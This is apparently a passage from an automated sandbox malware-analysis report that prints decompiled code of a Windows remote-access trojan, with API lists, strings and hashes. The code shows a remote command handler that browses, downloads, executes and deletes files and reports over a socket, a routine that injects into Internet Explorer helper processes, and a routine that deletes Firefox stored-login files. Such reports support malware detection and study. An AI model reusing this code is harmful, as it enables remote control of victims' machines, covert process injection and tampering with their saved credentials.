									L004086CB(0, 0x472f90, _t629, E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)));
									E004086D0(0, _t680 - 0x18, _t629, __eflags, 0x472f90);
									E00406EB0();
									_t297 = E0041A819( &_v492, E00408682(0x472f90,  &_v528, 0, E0040245C() - 2));
									_t629 = "Browsing directory: ";
									E004052DD(0, _t680 - 0x18 + 0x18 - 0x18, "Browsing directory: ", _t674, __eflags, _t297);
									E00402073(0, _t680 - 0x18 + 0x18 - 4, "Browsing directory: ", _t674, "i");
									E0041A04A(0, 0x472ec8);
									E00401FB8();
									goto L59;
								} else {
									_t668 = _t666 - 1;
									if(_t668 == 0) {
										E0040415E(0,  &_v544, _t629, _t674, E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)));
										ShellExecuteW(0, L"open", E00401EE4( &_v548), 0, 0, 1);
										_t307 = E0041A819( &_v476,  &_v548);
										_t629 = "Executing file: ";
										E004052DD(0, _t680 - 0x18, "Executing file: ", _t674, __eflags, _t307);
										E00402073(0, _t680 - 4, "Executing file: ", _t674, "i");
										E0041A04A(0, 0x472ec8);
										E00401FB8();
										goto L58;
									} else {
										_t669 = _t668 - 1;
										if(_t669 == 0) {
											 *0x470b18 = 0;
											E004020D6(0, _t680 - 0x18, _t629, __eflags, E00401E45( &_v552, _t629, _t674, __eflags, 2));
											E0040415E(0, _t680, _t629, _t674, 0x46a8f0);
											E0040415E(0, _t680 - 0xffffffffffffffe8, _t629, _t674, E00401F8B(E00401E45( &_v564, _t629, _t674, __eflags, 0)));
											E00401E45( &_v572, _t629, _t674, __eflags, 1);
											E004080F9(E0041A947(__eflags), _t629, 0x472ec8);
										} else {
											_t670 = _t669 - 1;
											if(_t670 == 0) {
												 *0x470b18 = 0;
												E004020BF(0,  &_v468);
												E004046D7( &_v396, _t674, 1);
												E004048A8( &_v400, _t670,  &_v396);
												_t324 = E00401E45( &_v560, _t629, _t674, __eflags, 3);
												_t718 = _t680 - 0x18;
												_t325 = E00401E45( &_v564, _t629, _t674, __eflags, 2);
												E00402EF0(0, _t718, E00402EF0(0,  &_v536, E00402EF0(0,  &_v512, E00402F11( &_v560, E00401E45( &_v568, _t629, _t674, __eflags, 1), _t674, 0x472ec8), _t674, __eflags, _t325), _t674, __eflags, 0x472ec8), _t674, __eflags, _t324);
												_push(0x56);
												E00404A81( &_v416, _t329, __eflags);
												E00401FB8();
												E00401FB8();
												E00401FB8();
												E0040415E(0,  &_v544, _t329, _t674, E00401F8B(E00401E45( &_v600, _t329, _t674, __eflags, 0)));
												_t338 = E0041A819( &_v572,  &_v548);
												_t719 = _t718 - 0x18;
												_t640 = "Downloading file: ";
												E004052DD(0, _t719, _t640, _t674, __eflags, _t338);
												_t720 = _t719 - 0x14;
												_t672 = "i";
												E00402073(0, _t720, _t640, _t674, "i");
												E0041A04A(0, 0x472ec8);
												E00401FB8();
												E00401EE9();
												_t345 = E00401F8B(E00401E45( &_v612, _t640, _t674, __eflags, 0));
												_t722 = _t720 + 0x30 - 0x18;
												E0040415E(0, _t722, _t640, _t674, _t345);
												_t349 = E0043E147(_t347, E00401F8B(E00401E45( &_v620, _t640, _t674, __eflags, 4)), 0, 0xa);
												_push(_t640);
												_push(_t349);
												_t350 = E00406FD7( &_v468, __eflags);
												_t724 = _t722 + 0x2c;
												_push(0);
												__eflags = _t350;
												if(__eflags == 0) {
													E0040415E(0,  &_v516, _t640, _t674, E00401F8B(E00401E45( &_v624, _t640, _t674, __eflags)));
													_t354 = E0041A819( &_v544,  &_v520);
													_t629 = "Failed to download file: ";
													E004052DD(0, _t724 - 0x18, "Failed to download file: ", _t674, __eflags, _t354);
													E00402073(0, _t724 - 4, "Failed to download file: ", _t674, "E");
													E0041A04A(0, 0x472ec8);
													E00401FB8();
													E00401EE9();
												} else {
													E0040415E(0,  &_v516, _t640, _t674, E00401F8B(E00401E45( &_v624, _t640, _t674, __eflags)));
													_t365 = E0041A819( &_v544,  &_v520);
													_t629 = "Downloaded file: ";
													E004052DD(0, _t724 - 0x18, "Downloaded file: ", _t674, __eflags, _t365);
													E00402073(0, _t724 - 4, "Downloaded file: ", _t674, "i");
													E0041A04A(0, 0x472ec8);
													E00401FB8();
													E00401EE9();
													E00402073(0, _t724 - 4 + 0x30 - 0x18, "Downloaded file: ", _t674, 0x464074);
													_push(0x58);
													E00404A81( &_v432, "Downloaded file: ", __eflags);
												}
												E00404E06(_t629);
												E00404EC2(0,  &_v416, _t629, _t672);
												L25:
												E00401FB8();
											} else {
												_t673 = _t670 - 1;
												_t745 = _t673;
												if(_t673 == 0) {
													E0040415E(0,  &_v544, _t629, _t674, E00401F8B(E00401E45( &_v552, _t629, _t674, _t745, _t673)));
													if((GetFileAttributesW(E00401EE4( &_v548)) & 0x00000010) == 0) {
														_t379 = DeleteFileW(E00401EE4( &_v548));
													} else {
														_t379 = E0041AC0A(E00401EE4( &_v548), _t629);
													}
													_t747 = _t379;
													_t748 = _t379 & 0xffffff00 | _t747 != 0x00000000;
													if((_t379 & 0xffffff00 | _t747 != 0x00000000) == 0) {
														_t732 = _t680 - 0x18;
														E0041A879(0, _t732,  &_v540);
														_push(0x55);
														E00404A81(0x472fc0,  &_v540, __eflags);
														_t383 = E0041A819( &_v544,  &_v568);
														_t733 = _t732 - 0x18;
														_t645 = "Unable to delete: ";
														E004052DD(0, _t733, "Unable to delete: ", _t674, __eflags, _t383);
														_t734 = _t733 - 0x14;
														_t614 = _t734;
														_push("E");
													} else {
														_t398 = E0041A819( &_v516,  &_v540);
														_t736 = _t680 - 0x18;
														_t645 = "Deleted file: ";
														E004052DD(0, _t736, "Deleted file: ", _t674, _t748, _t398);
														_t734 = _t736 - 0x14;
														_t614 = _t734;
														_push("i");
													}
													E00402073(0, _t614, _t645, _t674);
													E0041A04A(0, 0x472ec8);
													_t735 = _t734 + 0x30;
													E00401FB8();
													_t388 = E00401E45( &_v576, _t645, _t674, _t748, 1);
													_t629 = "1";
													_t617 = _t388;
													if(E00405AE5("1") != 0) {
														E004086B8(E0040869C( &_v560, _t617, _t617) + 1);
														_push(0x2a);
														_t629 =  &_v572;
														E00401EF3( &_v572,  &_v572, _t673, E00402F52(0,  &_v548,  &_v572, _t674));
														E00401EE9();
														E0040415E(0, _t735 - 0x18,  &_v572, _t674, E00401EE4( &_v576));
														L57:
														E00406EB0();
													}
													L58:
													L59:
													E00401EE9();
												}
											}
										}
									}
								}
							}
						}
					}
				}
				E00401E6D( &_v552, _t629);
				E00401FB8();
				E00401FB8();
				return 0;
			}



























































































































                    0x0040730b
                    0x0040730b
                    0x0040731b
                    0x0040731d
                    0x00407325
                    0x0040732d
                    0x00407347
                    0x00407351
                    0x00407356
                    0x00407361
                    0x00407366
                    0x00407373
                    0x0040737c
                    0x00407386
                    0x00407389
                    0x0040738b
                    0x00407ace
                    0x00407ace
                    0x00407ad4
                    0x00407dd6
                    0x00407dee
                    0x00407e01
                    0x00407e07
                    0x00407e1d
                    0x00407e27
                    0x00407e32
                    0x00407e41
                    0x00000000
                    0x00407ada
                    0x00407ada
                    0x00407ada
                    0x00407add
                    0x00407dae
                    0x00407dc8
                    0x00407dcc
                    0x00407ae3
                    0x00407ae3
                    0x00407ae3
                    0x00407ae6
                    0x00407cfe
                    0x00407d04
                    0x00407d09
                    0x00407d0f
                    0x00407d14
                    0x00407d1e
                    0x00407d2f
                    0x00407d34
                    0x00407d3a
                    0x00407d45
                    0x00407d53
                    0x00407d58
                    0x00407d5b
                    0x00407d61
                    0x00407d6c
                    0x00407d82
                    0x00407d87
                    0x00000000
                    0x00407d87
                    0x00407aec
                    0x00407aec
                    0x00407aec
                    0x00407aef
                    0x00407cea
                    0x00407af5
                    0x00407af5
                    0x00407af5
                    0x00407af8
                    0x00407ba4
                    0x00407ba9
                    0x00407baf
                    0x00407bb4
                    0x00407bb9
                    0x00407bbc
                    0x00407bbe
                    0x00407bd4
                    0x00407bd9
                    0x00407bf6
                    0x00407c17
                    0x00407c17
                    0x00407c19
                    0x00407cd1
                    0x00000000
                    0x00407c1f
                    0x00407c1f
                    0x00407c1f
                    0x00407c22
                    0x00407c7a
                    0x00407c89
                    0x00407c98
                    0x00407ca0
                    0x00407ca6
                    0x00407cab
                    0x00407cab
                    0x00000000
                    0x00407c24
                    0x00407c24
                    0x00407c27
                    0x00407c39
                    0x00407c48
                    0x00407c57
                    0x00407c5f
                    0x00407c65
                    0x00407c6a
                    0x00407cad
                    0x00407cad
                    0x00407cb9
                    0x00407cc6
                    0x00407cc6
                    0x00407c27
                    0x00407c22
                    0x00407c19
                    0x00407afe
                    0x00407afe
                    0x00407afe
                    0x00407b01
                    0x00407b5d
                    0x00407b62
                    0x00407b68
                    0x00407b6d
                    0x00407b72
                    0x00407b75
                    0x00407b77
                    0x00407b90
                    0x00407b96
                    0x00407cd4
                    0x00407cdb
                    0x00407ce0
                    0x00000000
                    0x00407ce0
                    0x00407b03
                    0x00407b03
                    0x00407b03
                    0x00407b06
                    0x00407b1f
                    0x00407b38
                    0x00407b3e
                    0x00407b48
                    0x00407b4d
                    0x00407d8c
                    0x00407d91
                    0x00407d91
                    0x00407b06
                    0x00407b01
                    0x00407af8
                    0x00407aef
                    0x00407ae6
                    0x00407add
                    0x00407391
                    0x00407391
                    0x004079e3
                    0x004079ff
                    0x00407a1b
                    0x00407a35
                    0x00407a45
                    0x00407a54
                    0x00407a56
                    0x00407a5b
                    0x00407a5b
                    0x00407a5e
                    0x00407a98
                    0x00407a9c
                    0x00407aa2
                    0x00407aa9
                    0x00407ab2
                    0x00407a60
                    0x00407a63
                    0x00407a6e
                    0x00407a74
                    0x00407a79
                    0x00407abb
                    0x00407ac4
                    0x00000000
                    0x00407397
                    0x00407397
                    0x0040739a
                    0x00407992
                    0x00407997
                    0x0040799d
                    0x004079a8
                    0x004079b5
                    0x004079ba
                    0x004079be
                    0x004079c3
                    0x004073a0
                    0x004073a0
                    0x004073a3
                    0x004078ec
                    0x00407900
                    0x00407917
                    0x0040791d
                    0x0040792c
                    0x00407935
                    0x0040794f
                    0x00407953
                    0x00407959
                    0x00407960
                    0x00407969
                    0x00407972
                    0x00000000
                    0x004073a9
                    0x004073a9
                    0x004073ac
                    0x0040786e
                    0x00407879
                    0x0040787e
                    0x004078a4
                    0x004078ac
                    0x004078b4
                    0x004078c3
                    0x004078c8
                    0x004078d4
                    0x00000000
                    0x004073b2
                    0x004073b2
                    0x004073b5
                    0x004077f2
                    0x0040780b
                    0x00407819
                    0x00407821
                    0x00407829
                    0x00407838
                    0x0040783d
                    0x00407849
                    0x00000000
                    0x004073bb
                    0x004073bb
                    0x004073be
                    0x00407778
                    0x00407789
                    0x00407798
                    0x004077b4
                    0x004077bf
                    0x004077cd
                    0x004073c4
                    0x004073c4
                    0x004073c7
                    0x0040751f
                    0x00407525
                    0x00407533
                    0x00407540
                    0x0040754b
                    0x00407550
                    0x0040755d
                    0x00407597
                    0x0040759d
                    0x004075a6
                    0x004075af
                    0x004075b8
                    0x004075c1
                    0x004075dc
                    0x004075e9
                    0x004075ee
                    0x004075f1
                    0x004075f9
                    0x004075fe
                    0x00407601
                    0x00407609
                    0x0040760e
                    0x0040761a
                    0x00407623
                    0x00407634
                    0x00407639
                    0x0040763f
                    0x0040765a
                    0x00407669
                    0x0040766a
                    0x0040766b
                    0x00407670
                    0x00407677
                    0x00407678
                    0x0040767a
                    0x00407704
                    0x00407711
                    0x00407719
                    0x00407721
                    0x00407730
                    0x00407735
                    0x00407741
                    0x0040774a
                    0x0040767c
                    0x0040768d
                    0x0040769a
                    0x004076a2
                    0x004076aa
                    0x004076b5
                    0x004076ba
                    0x004076c6
                    0x004076cf
                    0x004076de
                    0x004076e3
                    0x004076ec
                    0x004076ec
                    0x00407756
                    0x00407762
                    0x0040797b
                    0x0040797b
                    0x004073cd
                    0x004073cd
                    0x004073cd
                    0x004073d0
                    0x004073ec
                    0x00407407
                    0x0040741d
                    0x00407409
                    0x00407410
                    0x00407410
                    0x00407423
                    0x0040742c
                    0x0040742e
                    0x00407455
                    0x0040745a
                    0x0040745f
                    0x00407466
                    0x00407473
                    0x00407478
                    0x0040747b
                    0x00407483
                    0x00407488
                    0x0040748b
                    0x0040748d
                    0x00407430
                    0x00407434
                    0x00407439
                    0x0040743c
                    0x00407444
                    0x00407449
                    0x0040744c
                    0x0040744e
                    0x0040744e
                    0x00407492
                    0x00407497
                    0x0040749c
                    0x004074a3
                    0x004074ae
                    0x004074b3
                    0x004074b8
                    0x004074c1
                    0x004074d8
                    0x004074dd
                    0x004074df
                    0x004074f2
                    0x004074fb
                    0x0040750f
                    0x00407e46
                    0x00407e46
                    0x00407e4b
                    0x00407e4e
                    0x00407e52
                    0x00407e52
                    0x00407e52
                    0x004073d0
                    0x004073c7
                    0x004073be
                    0x004073b5
                    0x004073ac
                    0x004073a3
                    0x0040739a
                    0x00407391
                    0x00407e5b
                    0x00407e67
                    0x00407e70
                    0x00407e7d

                    APIs
                    • SetEvent.KERNEL32(?,?), ref: 0040732D
                    • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 004073FB
                    • DeleteFileW.KERNEL32(00000000), ref: 0040741D
                      • Part of subcall function 0041AC0A: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AC65
                      • Part of subcall function 0041AC0A: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AC95
                      • Part of subcall function 0041AC0A: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041ACEA
                      • Part of subcall function 0041AC0A: FindClose.KERNEL32(00000000,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD4B
                      • Part of subcall function 0041AC0A: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD52
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                      • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                      • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,0040545D,?,?,00000004,?,?,00000004,?,00472EE0,?), ref: 00404B27
                      • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00472EE0,?,?,?,?,?,?,0040545D), ref: 00404B55
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0040780B
                    • GetLogicalDriveStringsA.KERNEL32 ref: 004078EC
                    • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 00407B38
                    • DeleteFileA.KERNEL32(?), ref: 00407CC6
                      • Part of subcall function 00407E80: __EH_prolog.LIBCMT ref: 00407E85
                      • Part of subcall function 00407E80: FindFirstFileW.KERNEL32(00000000,?,004645D0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407F3E
                      • Part of subcall function 00407E80: __CxxThrowException@8.LIBVCRUNTIME ref: 00407F66
                      • Part of subcall function 00407E80: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407F73
                    • Sleep.KERNEL32(000007D0), ref: 00407D6C
                    • StrToIntA.SHLWAPI(00000000,00000000), ref: 00407DAE
                      • Part of subcall function 0041B35B: SystemParametersInfoW.USER32 ref: 0041B450
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                    • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                    • API String ID: 1067849700-1507758755
                    • Opcode ID: 36caf4fe5a422c6f71b5b50b610445828c1ff7a575c619d5082147cc6c9ac470
                    • Instruction ID: bd0fccd32b98e4baecd5a91fc22e0c60ebb53a858293cf8cc6cedc8d782afcc2
                    • Opcode Fuzzy Hash: 36caf4fe5a422c6f71b5b50b610445828c1ff7a575c619d5082147cc6c9ac470
                    • Instruction Fuzzy Hash: 8D42A671A083005BC604FB76C9579AF77A9AF90308F40093FF542771E2EE7D9A49869B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040E991 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 223processsynchronizationCOMMON
                    Download Yara Rule
                    C-Code - Quality: 98%
                    			E0040E991(void* __eflags, char _a4) {
				char _v0;
				void* _v8;
				char _v24;
				short _v524;
				char _v528;
				char _v540;
				char _v1060;
				char _v1088;
				void* _v1092;
				char _v1108;
				void* _v1112;
				char _v1120;
				void* _v1124;
				char _v1132;
				char _v1136;
				char _v1164;
				char _v1172;
				char _v1176;
				char _v1184;
				char _v1188;
				char _v1192;
				char _v1196;
				char _v1197;
				char _v1200;
				char _v1201;
				char _v1208;
				void* _v1212;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t72;
				void* _t82;
				void* _t83;
				char _t84;
				intOrPtr* _t111;
				void* _t117;
				void* _t121;
				struct _SECURITY_ATTRIBUTES* _t135;
				void* _t197;
				void* _t205;
				void* _t211;
				void* _t212;

				_t135 = 0;
				GetModuleFileNameW(0,  &_v524, 0x104);
				_t193 = "1";
				if(E00406E3A("1") != 0) {
					L14:
					E00401EF3( &_a4, _t193, _t207, E0041A1E5( &_v1108, __eflags));
					E00401EE9();
					_t72 = E00410698( &_v528,  &_v0);
					__eflags = _t72;
					if(_t72 == 0) {
						goto L15;
					}
				} else {
					E00401F66(0,  &_v1196);
					_t211 = CreateToolhelp32Snapshot(2, 0);
					_v1088 = 0x22c;
					_push( &_v1088);
					Process32FirstW(_t211);
					while(Process32NextW(_t211,  &_v1092) != 0) {
						E0040415E(_t135,  &_v1184, _t193, _t211,  &_v1060);
						_t111 = E004022E5( &_v1188,  &_v1164);
						_t207 = E004022AA( &_v1192,  &_v1164);
						E00409291( &_v1164,  *((intOrPtr*)(E004022E5( &_v1196,  &_v1164))),  *_t113,  *_t111);
						_t212 = _t212 + 0xc;
						_t193 =  &_v24;
						_t117 = E0040AF46( &_v24);
						__eflags = _t117;
						if(_t117 != 0) {
							E00401EF3( &_v1208, _v1088, _t207, E0041AB76( &_v1120, _v1088));
							E00401EE9();
							_t121 = E00406E3A( &_v540);
							__eflags = _t121;
							if(_t121 == 0) {
								_t193 = 0x46a8f0;
								__eflags = E00406E3A(0x46a8f0);
								if(__eflags != 0) {
									L12:
									E00401EE9();
									L13:
									E00401EE9();
									goto L14;
								} else {
									__eflags = E0041AB40(_v1088);
									if(__eflags != 0) {
										goto L12;
									} else {
										E0040AEE6( &_v1208);
										E00401EE9();
										break;
									}
								}
							} else {
								E00401EE9();
								E00401EE9();
							}
						} else {
							E00401EE9();
							continue;
						}
						goto L22;
					}
					CloseHandle(_t211);
					_t193 = 0x46a8f0;
					if(E00406E3A(0x46a8f0) != 0) {
						goto L13;
					} else {
						E00401EE9();
						L15:
						_t205 = CreateMutexA(_t135, 1, E00401F8B(E00406292( &_v1108, 0x473268, _t211, "-I")));
						E00401FB8();
						E004020BF(_t135,  &_v1132);
						E00401EE4(0x473220);
						E0041ADFE( &_v1132);
						_t82 = E00401F8B( &_v1132);
						_t83 = E00401EE4( &_a4);
						_t197 = _t82;
						_t84 = E00417456(_t83);
						_v1197 = _t84;
						if(_t84 != 0) {
							L20:
							E00412B5F(0x473238, E00401F8B(0x473238), "Inj", 1);
							_t135 = _v1197;
						} else {
							E0040415E(_t135,  &_v1172, _t197, _t211, L"C:\\Program Files(x86)\\Internet Explorer\\");
							E00401F8B( &_v1136);
							_v1201 = E00417456(E00401EE4(E004087F0( &_v1200,  &_v1176, _t211, L"ieinstal.exe")));
							E00401EE9();
							if(_v1201 != _t135) {
								L19:
								E00401EE9();
								goto L20;
							} else {
								E00401F8B( &_v1132);
								_v1197 = E00417456(E00401EE4(E004087F0( &_v1196,  &_v1172, _t211, L"ielowutil.exe")));
								E00401EE9();
								if(_v1197 != _t135) {
									goto L19;
								} else {
									CloseHandle(_t205);
									E00401EE9();
								}
							}
						}
						E00401FB8();
					}
				}
				L22:
				E00401EE9();
				return _t135;
			}













































                    0x0040e9a8
                    0x0040e9ab
                    0x0040e9b1
                    0x0040e9c4
                    0x0040eb4b
                    0x0040eb5c
                    0x0040eb65
                    0x0040eb78
                    0x0040eb7d
                    0x0040eb7f
                    0x00000000
                    0x00000000
                    0x0040e9ca
                    0x0040e9ce
                    0x0040e9dc
                    0x0040e9de
                    0x0040e9f0
                    0x0040e9f2
                    0x0040ea68
                    0x0040ea06
                    0x0040ea14
                    0x0040ea29
                    0x0040ea43
                    0x0040ea48
                    0x0040ea4b
                    0x0040ea56
                    0x0040ea5b
                    0x0040ea5d
                    0x0040eabf
                    0x0040eac8
                    0x0040ead8
                    0x0040eadd
                    0x0040eadf
                    0x0040eaf8
                    0x0040eb06
                    0x0040eb08
                    0x0040eb39
                    0x0040eb3d
                    0x0040eb46
                    0x0040eb46
                    0x00000000
                    0x0040eb0a
                    0x0040eb16
                    0x0040eb18
                    0x00000000
                    0x0040eb1a
                    0x0040eb26
                    0x0040eb2f
                    0x00000000
                    0x0040eb2f
                    0x0040eb18
                    0x0040eae1
                    0x0040eae5
                    0x0040eaee
                    0x0040eaee
                    0x0040ea5f
                    0x0040ea63
                    0x00000000
                    0x0040ea63
                    0x00000000
                    0x0040ea5d
                    0x0040ea80
                    0x0040ea86
                    0x0040ea9a
                    0x00000000
                    0x0040eaa0
                    0x0040eaa0
                    0x0040eb85
                    0x0040ebae
                    0x0040ebb0
                    0x0040ebb9
                    0x0040ebc3
                    0x0040ebce
                    0x0040ebd7
                    0x0040ebe5
                    0x0040ebea
                    0x0040ebee
                    0x0040ebf3
                    0x0040ebf9
                    0x0040ecaa
                    0x0040ecbd
                    0x0040ecc2
                    0x0040ebff
                    0x0040ec08
                    0x0040ec11
                    0x0040ec3f
                    0x0040ec43
                    0x0040ec4c
                    0x0040eca1
                    0x0040eca5
                    0x00000000
                    0x0040ec4e
                    0x0040ec52
                    0x0040ec80
                    0x0040ec84
                    0x0040ec8d
                    0x00000000
                    0x0040ec8f
                    0x0040ec90
                    0x0040ec9a
                    0x0040ec9a
                    0x0040ec8d
                    0x0040ec4c
                    0x0040eccc
                    0x0040eccc
                    0x0040ea9a
                    0x0040ecd1
                    0x0040ecd8
                    0x0040ece9

                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00473298,?,00473280), ref: 0040E9AB
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E9D6
                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E9F2
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040EA71
                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00473280), ref: 0040EA80
                      • Part of subcall function 0041AB76: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041AB8B
                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00473280), ref: 0040EBA4
                    • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00473280), ref: 0040EC90
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                    • String ID: 2G$82G$C:\Program Files(x86)\Internet Explorer\$Inj$h2G$ieinstal.exe$ielowutil.exe
                    • API String ID: 193334293-656281143
                    • Opcode ID: 05b2c2b54c2c9e0966ed25669dbd32bf8012f5f199f5605bad934836caaa4f6e
                    • Instruction ID: c6ac6d909184663fdd7a24f9be041a716c06b948c98e485a3872bbbcebe7606d
                    • Opcode Fuzzy Hash: 05b2c2b54c2c9e0966ed25669dbd32bf8012f5f199f5605bad934836caaa4f6e
                    • Instruction Fuzzy Hash: F98141301093419BC754FB62D8919EEB7E4AFA0348F40483FF586631E2EF789949CB5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B0AA Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 97%
                    			E0040B0AA(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				struct _WIN32_FIND_DATAA _v468;
				void* __esi;
				void* __ebp;
				void* _t41;
				signed int _t55;
				signed int _t57;
				int _t71;
				int _t73;
				void* _t132;
				void* _t133;
				void* _t134;
				void* _t135;
				void* _t136;

				_t141 = __eflags;
				_t132 = __edi;
				_t86 = __ebx;
				E004020BF(__ebx,  &_v100);
				E004020BF(__ebx,  &_v76);
				E004020BF(__ebx,  &_v28);
				_t41 = E00402073(_t86,  &_v124, __edx, _t135, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				E00401FC2( &_v28, _t42, _t133, E004052DD(_t86,  &_v52, E0043A9AA(_t86, __eflags, "UserProfile"), _t135, _t141, _t41));
				E00401FB8();
				E00401FB8();
				_t128 =  &_v28;
				_t134 = FindFirstFileA(E00401F8B(E00406292( &_v124,  &_v28, _t135, "*")),  &_v468);
				E00401FB8();
				_t142 = _t134 - 0xffffffff;
				if(_t134 != 0xffffffff) {
					while(1) {
						__eflags = FindNextFileA(_t134,  &_v468);
						if(__eflags == 0) {
							break;
						}
						__eflags = _v468.dwFileAttributes & 0x00000010;
						if((_v468.dwFileAttributes & 0x00000010) != 0) {
							_t55 = E0043E5D0( &(_v468.cFileName), ".");
							__eflags = _t55;
							if(_t55 != 0) {
								_t57 = E0043E5D0( &(_v468.cFileName), "..");
								__eflags = _t57;
								if(_t57 != 0) {
									E00401FC2( &_v100, _t59, _t134, E00408832(_t86,  &_v52, E00406292( &_v148,  &_v28, _t135,  &(_v468.cFileName)), _t132, _t135, __eflags, "\\logins.json"));
									E00401FB8();
									E00401FB8();
									_t128 = E00406292( &_v52,  &_v28, _t135,  &(_v468.cFileName));
									E00401FC2( &_v76, _t65, _t134, E00408832(_t86,  &_v148, _t65, _t132, _t135, __eflags, "\\key3.db"));
									E00401FB8();
									E00401FB8();
									_t71 = DeleteFileA(E00401F8B( &_v100));
									__eflags = _t71;
									if(_t71 == 0) {
										GetLastError();
									}
									_t73 = DeleteFileA(E00401F8B( &_v76));
									__eflags = _t73;
									if(_t73 == 0) {
										GetLastError();
									}
								}
							}
						}
					}
					E00402073(_t86, _t136 - 0x18, _t128, _t135, "\n[Firefox StoredLogins Cleared!]");
					E0040B752(_t86, _t128, _t135, __eflags);
					FindClose(_t134);
					goto L11;
				} else {
					FindClose(_t134);
					E00402073(_t86, _t136 - 0x18,  &_v28, _t135, "\n[Firefox StoredLogins not found]");
					E0040B752(_t86,  &_v28, _t135, _t142);
					L11:
					E00401FB8();
					E00401FB8();
					E00401FB8();
					return 1;
				}
			}






















                    0x0040b0aa
                    0x0040b0aa
                    0x0040b0aa
                    0x0040b0b7
                    0x0040b0bf
                    0x0040b0c7
                    0x0040b0d4
                    0x0040b0f4
                    0x0040b0fc
                    0x0040b104
                    0x0040b115
                    0x0040b132
                    0x0040b134
                    0x0040b139
                    0x0040b13c
                    0x0040b25e
                    0x0040b26c
                    0x0040b26e
                    0x00000000
                    0x00000000
                    0x0040b165
                    0x0040b16c
                    0x0040b17e
                    0x0040b185
                    0x0040b187
                    0x0040b199
                    0x0040b1a0
                    0x0040b1a2
                    0x0040b1d2
                    0x0040b1da
                    0x0040b1e5
                    0x0040b202
                    0x0040b214
                    0x0040b21f
                    0x0040b227
                    0x0040b235
                    0x0040b23b
                    0x0040b23d
                    0x0040b23f
                    0x0040b23f
                    0x0040b24e
                    0x0040b254
                    0x0040b256
                    0x0040b258
                    0x0040b258
                    0x0040b256
                    0x0040b1a2
                    0x0040b187
                    0x0040b16c
                    0x0040b27e
                    0x0040b283
                    0x0040b28c
                    0x00000000
                    0x0040b142
                    0x0040b143
                    0x0040b153
                    0x0040b158
                    0x0040b292
                    0x0040b295
                    0x0040b29d
                    0x0040b2a5
                    0x0040b2b0
                    0x0040b2b0

                    APIs
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B129
                    • FindClose.KERNEL32(00000000), ref: 0040B143
                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040B266
                    • FindClose.KERNEL32(00000000), ref: 0040B28C
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$CloseFile$FirstNext
                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                    • API String ID: 1164774033-3681987949
                    • Opcode ID: 073a4d63a48226157dde18ccb65b455a12d9a39e5646febe62d80ed98aa8a538
                    • Instruction ID: 4dbca2b9aa89f5e628085f7deb87cc68ab42e838c00934cc31fa014136c7fd8a
